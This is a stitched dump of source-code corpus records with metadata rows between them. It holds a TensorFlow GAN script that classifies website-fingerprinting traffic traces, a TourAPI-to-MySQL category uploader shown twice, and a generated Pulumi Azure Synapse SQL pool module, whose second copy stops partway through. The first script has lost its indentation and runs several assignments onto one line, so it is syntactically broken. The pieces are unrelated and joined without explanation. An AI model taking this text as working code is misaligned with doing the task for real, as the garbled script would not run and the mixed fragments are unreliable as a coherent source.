head_model.add(layers.Dense(units=args.num_classes, activation=None, name="Logits"))
return head_model
@property
def trainable_variables(self):
return self.tail.trainable_variables + self.head.trainable_variables
def __call__(self, x, *args, **kwargs):
features = self.tail(x, *args, **kwargs)
print(features.shape)
return self.head(features, *args, **kwargs), features
def accuracy(logits, labels):
preds = tf.argmax(logits, axis=1)
return tf.reduce_mean(tf.to_float(tf.equal(preds, labels)))
def main(args):
global best_acc
best_acc = 0
with tf.Graph().as_default():
print("Input data preprocessing...")
with tf.name_scope("DataPreprocess"):
r_train = 500.0 / 6.0
r_test = 100.0 / 6.0
nClass = 100 mon_instance = 2498.0 unClass = 0 unmon_instance = unClass
dim = 5000
with tf.device('/cpu:0'):
(train_x, train_y, test_x_data, test_y_data) = split_awf_closed(r_train, r_test, nClass, mon_instance,
unmon_instance, dim)
def reshape_and_scale(x, img_shape=(-1, dim, 1)):
return x.reshape(img_shape).astype(np.float32)
train_x = reshape_and_scale(train_x)
test_x_data = reshape_and_scale(test_x_data)
awf_data2 = np.load (HOME+'/datasets/awf2.npz', allow_pickle=True)
train_x_unlabeled = awf_data2['data']
train_y_unlabeled = awf_data2['labels']
train_x_unlabeled = reshape_and_scale(train_x_unlabeled)
X, y = shuffle(train_x, train_y)
print(X.shape)
print(y.shape)
print("Setup the input pipeline...")
with tf.name_scope("InputPipeline"):
train_x_labeled, train_y_labeled = [], []
for i in range(args.num_classes):
print(i)
train_x_labeled.append(X[y == i][:args.num_labeled_examples])
train_y_labeled.append(y[y == i][:args.num_labeled_examples])
train_x_labeled_data = np.concatenate(train_x_labeled)
train_y_labeled_data = np.concatenate(train_y_labeled)
train_x_unlabeled_data = train_x_unlabeled
train_y_unlabeled_data = train_y_unlabeled
train_x_unlabeled2, train_y_unlabeled2 = shuffle(train_x_unlabeled, train_y_unlabeled)
train_x_unlabeled2_data = train_x_unlabeled2
train_y_unlabeled2_data = train_y_unlabeled2
labeled_X = tf.placeholder(tf.float32, shape=[None, dim, 1])
labeled_y = tf.placeholder(tf.int64, shape=[None])
unlabeled_X = tf.placeholder(tf.float32, shape=[None, dim, 1])
unlabeled_y = tf.placeholder(tf.int64, shape=[None])
unlabeled_X2 = tf.placeholder(tf.float32, shape=[None, dim, 1])
unlabeled_y2 = tf.placeholder(tf.int64, shape=[None])
test_X = tf.placeholder(tf.float32, shape=[None, dim, 1])
test_y = tf.placeholder(tf.int64, shape=[None])
train_labeled_dataset = tf.data.Dataset.from_tensor_slices((labeled_X, labeled_y)) \
.shuffle(buffer_size=len(train_x_labeled_data)) \
.repeat()
train_labeled_dataset = train_labeled_dataset.batch(args.batch_size)
iterator_labeled = train_labeled_dataset.make_initializable_iterator()
traces_lab, labels_lab = iterator_labeled.get_next()
train_unlabeled_dataset = tf.data.Dataset.from_tensor_slices(
(unlabeled_X, unlabeled_y, unlabeled_X2, unlabeled_y2)) \
.shuffle(buffer_size=len(train_x_labeled_data)) \
.repeat()
train_unlabeled_dataset = train_unlabeled_dataset.batch(args.batch_size)
iterator_unlabeled = train_unlabeled_dataset.make_initializable_iterator()
traces_unl, labels_unl, traces_unl2, labels_unl2 = iterator_unlabeled.get_next()
test_dataset = tf.data.Dataset.from_tensor_slices((test_X, test_y)) \
.repeat()
test_dataset = test_dataset.batch(args.batch_size)
iterator_test = test_dataset.make_initializable_iterator()
traces_test, labels_test = iterator_test.get_next()
with tf.name_scope("BatchSize"):
batch_size_tensor = tf.shape(traces_lab)[0]
z, z_perturbed = define_noise(batch_size_tensor,args)
with tf.name_scope("Generator"):
g_model = define_generator()
traces_fake = g_model(z)
traces_fake_perturbed = g_model(z_perturbed)
with tf.name_scope("Discriminator") as discriminator_scope:
d_model = Discriminator()
logits_fake, features_fake = d_model(traces_fake, training=True)
logits_fake_perturbed, _ = d_model(traces_fake_perturbed, training=True)
logits_real_unl, features_real_unl = d_model(traces_unl, training=True)
logits_real_lab, features_real_lab = d_model(traces_lab, training=True)
logits_train, _ = d_model(traces_lab, training=False)
with tf.name_scope("DiscriminatorLoss"):
loss_supervised = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=labels_lab, logits=logits_real_lab))
logits_sum_real = tf.reduce_logsumexp(logits_real_unl, axis=1)
logits_sum_fake = tf.reduce_logsumexp(logits_fake, axis=1)
loss_unsupervised = 0.5 * (
tf.negative(tf.reduce_mean(logits_sum_real)) +
tf.reduce_mean(tf.nn.softplus(logits_sum_real)) +
tf.reduce_mean(tf.nn.softplus(logits_sum_fake)))
loss_d = loss_supervised + loss_unsupervised
if args.man_reg:
loss_d += 1e-3 * tf.nn.l2_loss(logits_fake - logits_fake_perturbed) \
/ tf.to_float(batch_size_tensor)
with tf.name_scope("Train") as train_scope:
optimizer = tf.train.AdamOptimizer(args.lr * 0.25)
optimize_d = optimizer.minimize(loss_d, var_list=d_model.trainable_variables)
train_accuracy_op = accuracy(logits_train, labels_lab)
with tf.name_scope(discriminator_scope):
with tf.control_dependencies([optimize_d]):
logits_fake, features_fake = d_model(traces_fake, training=True)
logits_real_unl, features_real_unl = d_model(traces_unl2, training=True)
with tf.name_scope("GeneratorLoss"):
feature_mean_real = tf.reduce_mean(features_real_unl, axis=0)
feature_mean_fake = tf.reduce_mean(features_fake, axis=0)
loss_g = tf.reduce_mean(tf.abs(feature_mean_real - feature_mean_fake))
with tf.name_scope(train_scope):
optimizer = tf.train.AdamOptimizer(args.lr, beta1=0.5)
train_op = optimizer.minimize(loss_g, var_list=g_model.trainable_variables)
with tf.name_scope(discriminator_scope):
with tf.name_scope("Test"):
logits_test, _ = d_model(traces_test, training=False)
test_accuracy_op = accuracy(logits_test, labels_test)
with tf.name_scope("Summaries"):
summary_op = tf.summary.merge([
tf.summary.scalar("LossDiscriminator", loss_d),
tf.summary.scalar("LossGenerator", loss_g),
tf.summary.scalar("ClassificationAccuracyTrain", train_accuracy_op),
tf.summary.scalar("ClassificationAccuracyTest", test_accuracy_op)])
writer = tf.summary.FileWriter(_next_logdir("tensorboard/wfi5_cw"))
print("Run training...")
steps_per_epoch = (len(train_x_labeled_data) + len(
train_x_unlabeled_data)) // args.batch_size
steps_per_test = test_x_data.shape[0] // args.batch_size
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
step = 0
for epoch in range(args.train_epochs):
losses_d, losses_g, accuracies = [], [], []
print("Epoch {}".format(epoch))
pbar = tqdm.trange(steps_per_epoch)
sess.run(iterator_labeled.initializer,
feed_dict={labeled_X: train_x_labeled_data, labeled_y: train_y_labeled_data})
sess.run(iterator_unlabeled.initializer,
feed_dict={unlabeled_X: train_x_unlabeled_data, unlabeled_y: train_y_unlabeled_data,
unlabeled_X2: train_x_unlabeled2_data, unlabeled_y2: train_y_unlabeled2_data})
sess.run(iterator_test.initializer, feed_dict={test_X: test_x_data, test_y: test_y_data})
for _ in pbar:
if step % 1000 == 0:
_, loss_g_batch, loss_d_batch, summ, accuracy_batch = sess.run(
[train_op, loss_g, loss_d, summary_op, train_accuracy_op])
writer.add_summary(summ, global_step=step)
else:
_, loss_g_batch, loss_d_batch, accuracy_batch = sess.run(
[train_op, loss_g, loss_d, train_accuracy_op])
pbar.set_description("Discriminator loss {0:.3f}, Generator loss {1:.3f}"
.format(loss_d_batch, loss_g_batch))
losses_d.append(loss_d_batch)
losses_g.append(loss_g_batch)
accuracies.append(accuracy_batch)
step += 1
print("Discriminator loss: {0:.4f}, Generator loss: {1:.4f}, "
"Train accuracy: {2:.4f}"
.format(np.mean(losses_d), np.mean(losses_g), np.mean(accuracies)))
accuracies = [sess.run(test_accuracy_op) for _ in range(steps_per_test)]
if np.mean (accuracies) > best_acc:
best_acc = np.mean (accuracies)
if epoch == (int(args.train_epochs)-1):
print ("Test accuracy: {0:.4f}".format (np.mean (accuracies)))
print ("Best accuracy: {0:.4f}".format (best_acc))
def define_noise(batch_size_tensor, args):
    """Draw a latent-noise batch and a slightly perturbed twin.

    Returns ``(z, z_perturbed)`` where ``z_perturbed`` is ``z`` plus an
    independent Gaussian sample scaled by 1e-5 (a tiny perturbation, e.g.
    for manifold-regularization consistency terms).

    NOTE(review): assumes ``tfd`` is the TensorFlow Probability
    distributions module imported at file level — confirm.
    """
    with tf.name_scope("LatentNoiseVector"):
        sample_shape = (batch_size_tensor, args.z_dim_size)
        noise_dist = tfd.Normal(loc=0.0, scale=args.stddev)
        z = noise_dist.sample(sample_shape=sample_shape)
        z_perturbed = z + noise_dist.sample(sample_shape=sample_shape) * 1e-5
    return z, z_perturbed
def split_awf_closed(r_train, r_test, nClass, mon_instance, unmon_instance, dim):
    """Partition the AWF closed-world traces into train/test arrays.

    Args:
        r_train, r_test: relative ratios used to size the training split.
        nClass: number of monitored classes to keep.
        mon_instance: number of recorded instances per monitored class.
        unmon_instance: unmonitored instance count (only printed here; kept
            for interface compatibility with the open-world splitter).
        dim: number of leading trace features kept per instance.

    Returns:
        (train_feature, train_label, test_feature, test_label) numpy arrays.

    NOTE(review): the original source was corrupted here — a print statement
    was truncated and the definition of ``mon_random`` was lost, leaving a
    syntax error and an undefined name.  The shuffled per-class index array
    is reconstructed below; confirm against the project's open-world variant.
    """
    mon_data = np.load(HOME + '/datasets/awf1.npz', allow_pickle=True)
    mon_x = mon_data['feature']
    print('mon_instance', mon_instance, ', unmon_instance', unmon_instance)

    # Shuffle the per-class instance indices once, then carve the same
    # shuffled index set into train/test so every class shares one split.
    num_mtrain_instance = mon_instance * (r_train / (r_train + r_test))
    mon_random = np.arange(int(mon_instance))
    np.random.shuffle(mon_random)
    mon_train_ins = mon_random[:int(num_mtrain_instance)]
    mon_test_ins = mon_random[int(num_mtrain_instance):]
    print('mon_test_ins', len(mon_test_ins))

    train_feature = np.zeros((nClass * len(mon_train_ins), dim), dtype=int)
    test_feature = np.zeros((nClass * len(mon_test_ins), dim), dtype=int)
    print('test_feature', len(test_feature))
    train_label = np.zeros((nClass * len(mon_train_ins),), dtype=int)
    test_label = np.zeros((nClass * len(mon_test_ins),), dtype=int)

    mon_instance = int(mon_instance)
    print('Monitored training set partitioning...')
    i = 0
    for c in range(nClass):
        for instance in mon_train_ins:
            train_label[i] = c
            # Instances of class c occupy the contiguous slice starting at
            # c * mon_instance in the flat feature array.
            train_feature[i] = mon_x[(c * mon_instance) + instance][:dim]
            i += 1
    print(i)

    print('Monitored testing set partitioning...')
    j = 0
    for c in range(nClass):
        for instance in mon_test_ins:
            test_label[j] = c
            test_feature[j] = mon_x[(c * mon_instance) + instance][:dim]
            j += 1
    print(j)

    print('train_feature: ', len(train_feature))
    print('train_label: ', len(train_label))
    print('test_feature: ', len(test_feature))
    print('test_label: ', len(test_label))
    print('train_dim: ', len(train_feature[0]))
    print('test_dim: ', len(test_feature[0]))
    return train_feature, train_label, test_feature, test_label
def _next_logdir(path):
    """Create and return the next unused ``runNNNN`` directory under *path*."""
    if not os.path.exists(path):
        os.makedirs(path)
    # Number the new run after the count of existing run subdirectories.
    run_count = sum(1 for entry in os.listdir(path)
                    if opth.isdir(opth.join(path, entry)))
    run_dir = opth.join(path, "run" + str(run_count).zfill(4))
    if not os.path.exists(run_dir):
        os.makedirs(run_dir)
    return run_dir
if __name__ == "__main__":
parser.add_argument ('--batch_size', required=False, default=32)
parser.add_argument ('--train_epochs', required=False, default=12)
parser.add_argument ('--lr', required=False, default=2e-4)
parser.add_argument ('--stddev', required=False, default=1e-2)
parser.add_argument ('--num_classes', required=False, default=100)
parser.add_argument ('--z_dim_size', required=False, default=100)
parser.add_argument ('--num_labeled_examples', required=False, default=5)
parser.add_argument ('--man_reg', required=False, default=True)
args = parser.parse_args ()
for i in range(5):
main(args)
| true | true |
7900e6e2df9688e62efaff5a46a81c06f7b852d3 | 1,359 | py | Python | 02_category_code.py | darkbright/TourAPI | 788d2973a964db073889c2a2443d6beaa8e38c87 | [
"MIT"
] | null | null | null | 02_category_code.py | darkbright/TourAPI | 788d2973a964db073889c2a2443d6beaa8e38c87 | [
"MIT"
] | null | null | null | 02_category_code.py | darkbright/TourAPI | 788d2973a964db073889c2a2443d6beaa8e38c87 | [
"MIT"
] | null | null | null | from tourapi.list import TourAPI
from tourapi.config import ServiceKey, MobileOS, MobileApp, Languages
from mysql_config import MysqlHost, MysqlUser, MysqlPass, MysqlDB
import pymysql
import json
def upload_category_codes(codes, language="Kor", level=0, cat1="", cat2="", cat3=""):
    """Upsert tourism category codes into the ``category_code`` table.

    The language-specific name column (``name_kor``, ``name_eng``, ...) is
    derived from *language*; on a duplicate key only that name is refreshed.
    ``level``/``cat1``/``cat2``/``cat3`` record the code's position in the
    three-level category hierarchy.

    NOTE(review): source indentation was lost upstream; the single commit
    after the loop matches the apparent intent — confirm.
    """
    global conn, curs
    name_column = "name_" + language.lower()
    query = """
    INSERT INTO category_code (code, cat1, cat2, cat3, level, {0}) VALUES (%s, %s, %s, %s, %s, %s)
    ON DUPLICATE KEY UPDATE {0}=%s
    """.format(name_column)
    for entry in codes:
        params = (entry["code"], cat1, cat2, cat3, level, entry["name"], entry["name"])
        curs.execute(query, params)
    conn.commit()
# Open the MySQL connection shared (via globals) with upload_category_codes.
conn = pymysql.connect(host = MysqlHost, user = MysqlUser, password = MysqlPass, db = MysqlDB)
curs = conn.cursor()
for lan in Languages:
    language = lan["code"]
    api = TourAPI(ServiceKey, language)
    # Top-level (depth-1) categories.
    cat1_codes = api.list_category_code()
    upload_category_codes(cat1_codes, language, 1)
    # Walk depth-2 and depth-3 categories beneath each parent code.
    for cat1 in cat1_codes:
        cat2_codes = api.list_category_code(cat1["code"])
        upload_category_codes(cat2_codes, language, 2, cat1["code"])
        print(cat2_codes)
        for cat2 in cat2_codes:
            cat3_codes = api.list_category_code(cat1["code"], cat2["code"])
            upload_category_codes(cat3_codes, language, 3, cat1["code"], cat2["code"])
conn.commit()
conn.close()
from tourapi.config import ServiceKey, MobileOS, MobileApp, Languages
from mysql_config import MysqlHost, MysqlUser, MysqlPass, MysqlDB
import pymysql
import json
def upload_category_codes(codes, language="Kor", level=0, cat1="", cat2="", cat3=""):
    """Upsert category codes into ``category_code`` for one language.

    On a duplicate key only the language-specific name column
    (``name_kor``, ``name_eng``, ...) is refreshed.
    """
    global conn, curs
    # The target name column is chosen from the language code.
    query = """
    INSERT INTO category_code (code, cat1, cat2, cat3, level, name_{0}) VALUES (%s, %s, %s, %s, %s, %s)
    ON DUPLICATE KEY UPDATE name_{0}=%s
    """.format(language.lower())
    for code in codes:
        curs.execute(query, (code["code"], cat1, cat2, cat3, level, code["name"], code["name"]))
    # NOTE(review): original indentation was lost; commit assumed once after
    # the loop — confirm.
    conn.commit()
    return
# Shared DB connection used as globals by upload_category_codes above.
conn = pymysql.connect(host = MysqlHost, user = MysqlUser, password = MysqlPass, db = MysqlDB)
curs = conn.cursor()
for lan in Languages:
    language = lan["code"]
    api = TourAPI(ServiceKey, language)
    # Depth-1 categories, then depth-2/depth-3 beneath each parent.
    cat1_codes = api.list_category_code()
    upload_category_codes(cat1_codes, language, 1)
    for cat1 in cat1_codes:
        cat2_codes = api.list_category_code(cat1["code"])
        upload_category_codes(cat2_codes, language, 2, cat1["code"])
        print(cat2_codes)
        for cat2 in cat2_codes:
            cat3_codes = api.list_category_code(cat1["code"], cat2["code"])
            upload_category_codes(cat3_codes, language, 3, cat1["code"], cat2["code"])
conn.commit()
conn.close()
7900e764e5405f4daa5115b4afcb175efd0c2b01 | 13,465 | py | Python | sdk/python/pulumi_azure_native/synapse/v20200401preview/sql_pools_v3.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/synapse/v20200401preview/sql_pools_v3.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/synapse/v20200401preview/sql_pools_v3.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._inputs import *
__all__ = ['SqlPoolsV3Args', 'SqlPoolsV3']
# Auto-generated by the Pulumi SDK generator — limit hand edits to comments.
@pulumi.input_type
class SqlPoolsV3Args:
    def __init__(__self__, *,
                 resource_group_name: pulumi.Input[str],
                 workspace_name: pulumi.Input[str],
                 location: Optional[pulumi.Input[str]] = None,
                 sku: Optional[pulumi.Input['SkuArgs']] = None,
                 sql_pool_name: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
        """
        The set of arguments for constructing a SqlPoolsV3 resource.
        :param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
        :param pulumi.Input[str] workspace_name: The name of the workspace.
        :param pulumi.Input[str] location: The geo-location where the resource lives
        :param pulumi.Input['SkuArgs'] sku: The sql pool SKU. The list of SKUs may vary by region and support offer.
        :param pulumi.Input[str] sql_pool_name: The name of the sql pool.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
        """
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        pulumi.set(__self__, "workspace_name", workspace_name)
        # Optional arguments are stored only when explicitly provided.
        if location is not None:
            pulumi.set(__self__, "location", location)
        if sku is not None:
            pulumi.set(__self__, "sku", sku)
        if sql_pool_name is not None:
            pulumi.set(__self__, "sql_pool_name", sql_pool_name)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The name of the resource group. The name is case insensitive.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="workspaceName")
    def workspace_name(self) -> pulumi.Input[str]:
        """
        The name of the workspace.
        """
        return pulumi.get(self, "workspace_name")

    @workspace_name.setter
    def workspace_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "workspace_name", value)

    @property
    @pulumi.getter
    def location(self) -> Optional[pulumi.Input[str]]:
        """
        The geo-location where the resource lives
        """
        return pulumi.get(self, "location")

    @location.setter
    def location(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "location", value)

    @property
    @pulumi.getter
    def sku(self) -> Optional[pulumi.Input['SkuArgs']]:
        """
        The sql pool SKU. The list of SKUs may vary by region and support offer.
        """
        return pulumi.get(self, "sku")

    @sku.setter
    def sku(self, value: Optional[pulumi.Input['SkuArgs']]):
        pulumi.set(self, "sku", value)

    @property
    @pulumi.getter(name="sqlPoolName")
    def sql_pool_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the sql pool.
        """
        return pulumi.get(self, "sql_pool_name")

    @sql_pool_name.setter
    def sql_pool_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "sql_pool_name", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Resource tags.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)
# Auto-generated by the Pulumi SDK generator — limit hand edits to comments.
class SqlPoolsV3(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 sku: Optional[pulumi.Input[pulumi.InputType['SkuArgs']]] = None,
                 sql_pool_name: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 workspace_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        A sql pool resource.

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] location: The geo-location where the resource lives
        :param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
        :param pulumi.Input[pulumi.InputType['SkuArgs']] sku: The sql pool SKU. The list of SKUs may vary by region and support offer.
        :param pulumi.Input[str] sql_pool_name: The name of the sql pool.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
        :param pulumi.Input[str] workspace_name: The name of the workspace.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: SqlPoolsV3Args,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        A sql pool resource.

        :param str resource_name: The name of the resource.
        :param SqlPoolsV3Args args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads above based on the runtime args.
        resource_args, opts = _utilities.get_resource_args_opts(SqlPoolsV3Args, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       location: Optional[pulumi.Input[str]] = None,
                       resource_group_name: Optional[pulumi.Input[str]] = None,
                       sku: Optional[pulumi.Input[pulumi.InputType['SkuArgs']]] = None,
                       sql_pool_name: Optional[pulumi.Input[str]] = None,
                       tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                       workspace_name: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        # Standard generated boilerplate: normalize opts and validate inputs.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = SqlPoolsV3Args.__new__(SqlPoolsV3Args)

            __props__.__dict__["location"] = location
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            __props__.__dict__["sku"] = sku
            __props__.__dict__["sql_pool_name"] = sql_pool_name
            __props__.__dict__["tags"] = tags
            if workspace_name is None and not opts.urn:
                raise TypeError("Missing required property 'workspace_name'")
            __props__.__dict__["workspace_name"] = workspace_name
            # Output-only properties start as None and are filled by the engine.
            __props__.__dict__["current_service_objective_name"] = None
            __props__.__dict__["kind"] = None
            __props__.__dict__["name"] = None
            __props__.__dict__["requested_service_objective_name"] = None
            __props__.__dict__["sql_pool_guid"] = None
            __props__.__dict__["status"] = None
            __props__.__dict__["system_data"] = None
            __props__.__dict__["type"] = None
        # Aliases cover every API version of this resource type so state from
        # older provider versions still resolves to this resource.
        alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:synapse/v20200401preview:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20190601preview:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20190601preview:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20201201:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20201201:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20210301:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20210301:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20210401preview:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20210401preview:SqlPoolsV3")])
        opts = pulumi.ResourceOptions.merge(opts, alias_opts)
        super(SqlPoolsV3, __self__).__init__(
            'azure-native:synapse/v20200401preview:SqlPoolsV3',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None) -> 'SqlPoolsV3':
        """
        Get an existing SqlPoolsV3 resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        # All properties are None here; the engine populates them from state.
        __props__ = SqlPoolsV3Args.__new__(SqlPoolsV3Args)

        __props__.__dict__["current_service_objective_name"] = None
        __props__.__dict__["kind"] = None
        __props__.__dict__["location"] = None
        __props__.__dict__["name"] = None
        __props__.__dict__["requested_service_objective_name"] = None
        __props__.__dict__["sku"] = None
        __props__.__dict__["sql_pool_guid"] = None
        __props__.__dict__["status"] = None
        __props__.__dict__["system_data"] = None
        __props__.__dict__["tags"] = None
        __props__.__dict__["type"] = None
        return SqlPoolsV3(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="currentServiceObjectiveName")
    def current_service_objective_name(self) -> pulumi.Output[str]:
        """
        The current service level objective name of the sql pool.
        """
        return pulumi.get(self, "current_service_objective_name")

    @property
    @pulumi.getter
    def kind(self) -> pulumi.Output[str]:
        """
        Kind of SqlPool.
        """
        return pulumi.get(self, "kind")

    @property
    @pulumi.getter
    def location(self) -> pulumi.Output[str]:
        """
        The geo-location where the resource lives
        """
        return pulumi.get(self, "location")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The name of the resource
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="requestedServiceObjectiveName")
    def requested_service_objective_name(self) -> pulumi.Output[str]:
        """
        The requested service level objective name of the sql pool.
        """
        return pulumi.get(self, "requested_service_objective_name")

    @property
    @pulumi.getter
    def sku(self) -> pulumi.Output[Optional['outputs.SkuResponse']]:
        """
        The sql pool SKU. The list of SKUs may vary by region and support offer.
        """
        return pulumi.get(self, "sku")

    @property
    @pulumi.getter(name="sqlPoolGuid")
    def sql_pool_guid(self) -> pulumi.Output[str]:
        """
        The Guid of the sql pool.
        """
        return pulumi.get(self, "sql_pool_guid")

    @property
    @pulumi.getter
    def status(self) -> pulumi.Output[str]:
        """
        The status of the sql pool.
        """
        return pulumi.get(self, "status")

    @property
    @pulumi.getter(name="systemData")
    def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
        """
        SystemData of SqlPool.
        """
        return pulumi.get(self, "system_data")

    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        Resource tags.
        """
        return pulumi.get(self, "tags")

    @property
    @pulumi.getter
    def type(self) -> pulumi.Output[str]:
        """
        The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
        """
        return pulumi.get(self, "type")
| 41.303681 | 789 | 0.637653 |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._inputs import *
__all__ = ['SqlPoolsV3Args', 'SqlPoolsV3']
# Auto-generated by the Pulumi SDK generator — limit hand edits to comments.
@pulumi.input_type
class SqlPoolsV3Args:
    """The set of arguments for constructing a SqlPoolsV3 resource."""
    def __init__(__self__, *,
                 resource_group_name: pulumi.Input[str],
                 workspace_name: pulumi.Input[str],
                 location: Optional[pulumi.Input[str]] = None,
                 sku: Optional[pulumi.Input['SkuArgs']] = None,
                 sql_pool_name: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
        """
        :param resource_group_name: Name of the resource group (case insensitive).
        :param workspace_name: Name of the workspace.
        :param location: The geo-location where the resource lives.
        :param sku: The sql pool SKU.
        :param sql_pool_name: Name of the sql pool.
        :param tags: Resource tags.
        """
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        pulumi.set(__self__, "workspace_name", workspace_name)
        # Optional arguments are stored only when explicitly provided.
        if location is not None:
            pulumi.set(__self__, "location", location)
        if sku is not None:
            pulumi.set(__self__, "sku", sku)
        if sql_pool_name is not None:
            pulumi.set(__self__, "sql_pool_name", sql_pool_name)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """Name of the resource group (case insensitive)."""
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="workspaceName")
    def workspace_name(self) -> pulumi.Input[str]:
        """Name of the workspace."""
        return pulumi.get(self, "workspace_name")

    @workspace_name.setter
    def workspace_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "workspace_name", value)

    @property
    @pulumi.getter
    def location(self) -> Optional[pulumi.Input[str]]:
        """The geo-location where the resource lives."""
        return pulumi.get(self, "location")

    @location.setter
    def location(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "location", value)

    @property
    @pulumi.getter
    def sku(self) -> Optional[pulumi.Input['SkuArgs']]:
        """The sql pool SKU."""
        return pulumi.get(self, "sku")

    @sku.setter
    def sku(self, value: Optional[pulumi.Input['SkuArgs']]):
        pulumi.set(self, "sku", value)

    @property
    @pulumi.getter(name="sqlPoolName")
    def sql_pool_name(self) -> Optional[pulumi.Input[str]]:
        """Name of the sql pool."""
        return pulumi.get(self, "sql_pool_name")

    @sql_pool_name.setter
